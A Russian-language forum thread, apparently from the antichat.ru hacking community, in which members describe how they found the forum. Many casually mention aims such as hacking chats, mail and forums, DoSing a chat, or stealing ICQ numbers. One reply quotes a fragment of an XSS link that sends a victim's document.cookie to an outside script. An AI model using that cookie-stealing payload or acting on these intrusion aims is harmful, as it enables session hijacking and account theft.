![]() |
Pepsicola
ты бы знал чего я хочу :)) |
Раньше мои волосы были сухие и ломкие но как только я нашол етот форум и зарегился мои проблемы с волосами закончились
мне просто их все повыдерали за взлом сервака в школе халявной игры в комютерных клубах --) ------------------------------ Шютка! |
приветствую...
Цитата:
|
случайно..... и вобще незнаю что это за форум.....
|
во во именно так и было - "Искал где мона почитать, как взломать мыльники и чаты. С ссылки на сайте прошел на форум."
|
1 вариант ))) Так вот и натнулся на ачат ))) Искал инфу по взлому чего-то ))) И ещё тут есть "вина" чатов на мыл.ру )))
|
гугл... вот от тудава я :)
|
Я вообще попала сюда довольно забавно,на одном из форумов которые админила нашла в чьем-то постиге чтото вроде "....бла-бла-бла http://antichat.ru/cgi-bin/s.jpg?+document.cookie....." вот решила полубопытствовать кто стащить печенюшки хотел зашла по ссылке ,ну и осталась тут))
|
Привел друг.
Сказал посмотри, кто там тусется, может понравится. Ну как видите понравилось )))) |
искал как вломать форум на phpBB что бы отомстить админам, давно это было ... )))
|
Я раньше только на видео.античат.ру сидел и не подозревал, что на форуме так интересно и прикольно ((( целых пол года не знал, что на форуме туса прикольая ))) Сцуко ((( А как узнал мне тут не понравилось первое время, а потом привык и щас форум античата для меня, как дом родной )))
|
Цитата:
Цитата:
|
бл* я тут с начала года.... причем тут регистрация ??? обязательно ли регистрироваться когда просматриваешь форум или качаешь видео ????????????????????
|
Друг адрес дал.
Оч давно :p |
Я про Xss искал...И уязвимости в форумах и чатах...
Сначала на античат а потом уш и на форум припёрся. |
искал видео...даже всё скачал...)
|
a ya sidel v chate nashego goroda i dumal kak ego slomat':)
|
Что-то искал, ничего конкретного. Вообщем набрёл =)
вобщемто да =))) еще давным давно нашел сайт а на форуме стал токо щас сидеть =))) |
а мне друг дал ссылку
|
Кхм. Надо было одну Xss посмотреть. зашел на ачат, т.к. это одн из лучших реурсов на эту тему. Увидел другие, заинтересовался. Подписался на Rss форума, читал, ужасался "умным" вопросам:-). Но как я и ожидал, под этой всей шелухой спратанные лежат очень, очень интересные вещи! Надо только уметь присмотреться ;-) Я рад что я тут:-)
|
мне друг в чате ссылку дал,шоб меня научили как в этом самом чате флудить,приваты читать и т.д и тп... ГУРУ! ТЫ ГДЕ???
|
Учиться, учиться и ещё раз учиться!!! Вот это желание меня сюда и привело, друг дал ссылочку на Античат ;)
|
я ач с 2003 года знаю
|
Цитата:
|
Сначала тупо пробил в яндексе, как угнать 6значную асю, ну а там и на этот мега сайтик вышел!!!
|
как ни станно но адрес я нашел в каком то сикюрном журнале:) причем antichat.ru Ну а от него до форума рукой подать)
|
Я вообще как видео посмотрел так сразу крыша погнала
там и сыллку нашол а видео мне дали :)))) так вот охото научица но блин помащь нужна !!!!! Незнаю даже с чего начять Подскажите люде добрые |
хех, ну у меня намного проще...
друган дал кукисы, чтобы в phpBB 2.0.13 смотреть скрытых пользователей ) для меня в тот момент это было очень актуально..з потому что сам целыми днями зависал на бесплатном форуме *б/п номер для дозвона, там проверка статистики карт и форум*.. вот... я грю - а где надыбал то ? он - да вот, тк и так - видео на video.antichat.ru (тада ещё было РУ +))... хех, вот так я здесь ) |
было острое желание задосить чат на мейле, так я познакомился с работами скальпеля. потом продолжил сам, а потом зявазал)
|
Хотел вопрос задать про взлом ipb 2.0.1, но потом решил остаться! =)
|
А я насколько помню,то искал какую то прогу через yandex и пришёл по ссылке суда.
|
А я через бабушкин гипертерминал свалился:)
|
Хотел научится как ломать чаты ,так и решил остатся
|
чисто случайно, хотел гденить свой ник написать :)
|
Знакомый дал линк :)
|
http://forum.antichat.ru/ да вот по это ссылке ! =)))
|
а я у друга увидел =) потом сам зашел и зарегился тут ^^ всё довольно просто
|
Меня тип знакомый посоветовал, сказал что там Zadoxlik тусуется, ну я подумал что раз он там отвисает, значит форум хороший
|
попал ходом мыслей:-))
|
что то про XsS искал, не помню что именно.. ну и ссылка на форум была.. вот:)
|
| Время: 09:29 |